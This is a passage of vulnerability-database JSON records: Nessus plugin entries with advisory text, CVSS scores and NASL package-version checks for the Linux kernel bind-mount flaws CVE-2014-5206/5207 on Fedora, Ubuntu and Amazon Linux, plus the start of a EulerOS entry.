audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.15.10-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:13:07", "description": "The 3.14.17 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces The 3.14.16 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-08-20T00:00:00", "title": "Fedora 19 : kernel-3.14.17-100.fc19 (2014-9449)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9449.NASL", "href": "https://www.tenable.com/plugins/nessus/77269", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9449.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77269);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"FEDORA\", value:\"2014-9449\");\n\n script_name(english:\"Fedora 19 : kernel-3.14.17-100.fc19 (2014-9449)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.17 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces The 3.14.16 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1129662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136869.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d580f64\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"kernel-3.14.17-100.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:41", "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used\nwith user namespaces. 
An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2014-08-18T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2317-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2317-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77236", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2317-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77236);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"USN\", value:\"2317-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2317-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2317-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-5206\", \"CVE-2014-5207\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2317-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-34-generic\", pkgver:\"3.13.0-34.60~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-34-generic-lpae\", pkgver:\"3.13.0-34.60~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:41", "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. 
(CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2014-08-18T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-2318-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2318-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2318-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77237);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"USN\", value:\"2318-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-2318-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2318-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-5206\", \"CVE-2014-5207\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2318-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-generic\", pkgver:\"3.13.0-34.60\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-generic-lpae\", pkgver:\"3.13.0-34.60\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-lowlatency\", pkgver:\"3.13.0-34.60\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / 
linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:55", "description": "fs/namespace.c in the Linux kernel through 3.16.1 does not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allows local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nThe do_remount function in fs/namespace.c in the Linux kernel through\n3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allows local users to bypass an intended read-only\nrestriction and defeat certain sandbox protection mechanisms via a\n'mount -o remount' command within a user namespace.", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2014-417)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-417.NASL", "href": "https://www.tenable.com/plugins/nessus/78360", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 
ALAS-2014-417.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78360);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_xref(name:\"ALAS\", value:\"2014-417\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2014-417)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fs/namespace.c in the Linux kernel through 3.16.1 does not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allows local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nThe do_remount function in fs/namespace.c in the Linux kernel through\n3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allows local users to bypass an intended read-only\nrestriction and defeat certain sandbox protection mechanisms via a\n'mount -o remount' command within a user namespace.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-417.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. 
You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-3.14.19-17.43.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:56:07", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In the ea_get function in fs/jfs/xattr.c in the Linux\n kernel through 4.17.1, a memory corruption bug in JFS\n can be triggered by calling setxattr twice with two\n different extended attribute names on the same file.\n This vulnerability can be triggered by an unprivileged\n user with the ability to create files and execute\n programs. A kmalloc call is incorrect, leading to\n slab-out-of-bounds in jfs_xattr.(CVE-2018-12233)\n\n - The spectre_v2_select_mitigation function in\n arch/x86/kernel/cpu/bugs.c in the Linux kernel before\n 4.18.1 does not always fill RSB upon a context switch,\n which makes it easier for attackers to conduct\n userspace-userspace spectreRSB\n attacks.(CVE-2018-15572)\n\n - Race condition in the queue_delete function in\n sound/core/seq/seq_queue.c in the Linux kernel before\n 4.4.1 allows local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time.(CVE-2016-2544)\n\n - A flaw was found in the Linux kernel's implementation\n of BPF in which systems can application can overflow a\n 32 bit refcount in both program and map refcount. 
This\n refcount can wrap and end up a user after\n free.(CVE-2016-4558)\n\n - Interpretation conflict in\n drivers/md/dm-snap-persistent.c in the Linux kernel\n through 3.11.6 allows remote authenticated users to\n obtain sensitive information or modify data via a\n crafted mapping to a snapshot block\n device.(CVE-2013-4299)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - A vulnerability in the handling of Transactional Memory\n on powerpc systems was found. An unprivileged local\n user can crash the kernel by starting a transaction,\n suspending it, and then calling any of the exec() class\n system calls.(CVE-2016-5828)\n\n - A cross-boundary flaw was discovered in the Linux\n kernel software raid driver. The driver accessed a\n disabled bitmap where only the first byte of the buffer\n was initialized to zero. This meant that the rest of\n the request (up to 